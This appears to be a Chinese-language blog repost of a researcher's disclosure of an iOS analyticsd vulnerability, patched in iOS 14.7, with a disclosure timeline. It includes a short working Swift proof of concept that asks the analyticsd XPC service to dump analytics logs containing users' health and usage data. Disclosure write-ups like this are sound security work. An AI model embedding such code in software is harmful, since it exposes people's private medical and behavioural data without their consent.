Jailbreak #004:允许任何应用程序访问分析日志的 Analyticsd 漏洞

知识小集

共 1722字,需浏览 4分钟

 ·

2021-11-08 08:15

报告人:illusionofchaos

已修复版本:iOS 14.7

这个漏洞允许任何用户安装的应用程序访问分析日志(例如您可以在Settings -> Privacy -> Analytics & Improvements -> Analytics Data -> Analytics-90Day... and Analytics-Daily... 看到的那些日志)。这些日志包含以下信息(包括但不限于):

  • 医疗信息(心率、检测到的房颤和心律不齐事件的计数)

  • 月经周期长度、生理性别和年龄、宫颈粘液质量等。

  • 设备使用信息(不同上下文中的设备拾取、推送通知计数和用户操作等)

  • 具有各自 bundle ID 的所有应用程序的屏幕时间信息和会话计数

  • 有关设备配件及其制造商、型号、固件版本和用户指定名称的信息

  • 应用程序因 bundle ID 和异常代码而崩溃

  • 用户在 Safari 中查看的网页语言

Apple 正在出于未知目的收集所有这些信息,这非常令人不安,尤其是正在收集医疗信息这一事实。这就是为什么苹果声称他们非常关心隐私是非常虚伪的。即使在设置中关闭了“共享分析”,所有这些数据也会被收集并可供攻击者使用。

func analytics_json() -> String? {
let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2)
xpc_connection_set_event_handler(connection, { _ in })
xpc_connection_resume(connection)
let xdict = xpc_dictionary_create(nil, nil, 0)
xpc_dictionary_set_string(xdict, "command", "log-dump");
let reply = xpc_connection_send_message_with_reply_sync(connection, xdict);
return xpc_dictionary_get_string(reply, "log-dump");
}

时间线:

2021 年 4 月 29 日 - illusionofchaos向 Apple 报告了该漏洞

4 月 30 日 - Apple 承认了illusionofchaos的报告

5 月 20 日 - illusionofchaos已请求 Apple 更新状态(但未收到回复)

5 月 30 日 - illusionofchaos已向 Apple 请求状态更新

6 月 3 日 - Apple 回复说他们计划在即将到来的更新中解决这个问题

7 月 19 日 - iOS 14.7 与修复一起发布

7 月 20 日 - illusionofchaos已向 Apple 请求状态更新

7 月 21 日 - iOS 14.7 安全内容列表发布,未提及此漏洞

7 月 22 日 - illusionofchaos向 Apple 提出了一个问题,为什么该漏洞不在列表中 同一天 illusionofchaos 收到以下回复:由于处理问题,您的信用将包含在即将发布的更新中的安全公告中。官方对不便表示抱歉。

7 月 26 日 - iOS 14.7.1 安全内容列表发布,仍未提及此漏洞

9 月 13 日 - iOS 14.8 安全内容列表发布,仍然没有提及此漏洞。同一天,illusionofchaos 要求解释并通知 Apple,除非 illusionofchaos 很快收到回复,否则 illusionofchaos 将公开我所有的研究

9 月 20 日 - iOS 15.0 安全内容列表发布,仍未提及此漏洞


浏览 98
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报